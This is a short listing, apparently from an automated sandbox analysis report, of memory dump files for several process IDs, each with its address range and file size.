memory/4744-262-0x00007FFC95270000-0x00007FFC95280000-memory.dmpFilesize
64KB
-
memory/4744-313-0x0000020091480000-0x00000200914AA000-memory.dmpFilesize
168KB
-
memory/4812-135-0x0000000000030000-0x0000000000278000-memory.dmpFilesize
2.3MB
-
memory/4812-140-0x00007FFCB62A0000-0x00007FFCB6D61000-memory.dmpFilesize
10.8MB
-
memory/4812-130-0x0000000000000000-mapping.dmp
-
memory/4812-154-0x000000001D2F0000-0x000000001D302000-memory.dmpFilesize
72KB
-
memory/4852-150-0x00000000058A0000-0x0000000005906000-memory.dmpFilesize
408KB
-
memory/4852-177-0x0000000006480000-0x0000000006512000-memory.dmpFilesize
584KB
-
memory/4852-162-0x00000000069F0000-0x0000000006F94000-memory.dmpFilesize
5.6MB
-
memory/4852-143-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/4852-142-0x0000000000000000-mapping.dmp
-
memory/4892-317-0x000002056A8B0000-0x000002056A8DA000-memory.dmpFilesize
168KB
-
memory/4892-302-0x0000000000000000-mapping.dmp
-
memory/5072-307-0x0000000000000000-mapping.dmp
-
memory/5072-309-0x00000297E4930000-0x00000297E495A000-memory.dmpFilesize
168KB
-
memory/5072-308-0x00000297E4900000-0x00000297E492A000-memory.dmpFilesize
168KB
-
memory/5096-168-0x0000000000000000-mapping.dmp
-
memory/5112-296-0x00000157BE4A0000-0x00000157BE4CA000-memory.dmpFilesize
168KB
-
memory/5112-292-0x0000000000000000-mapping.dmp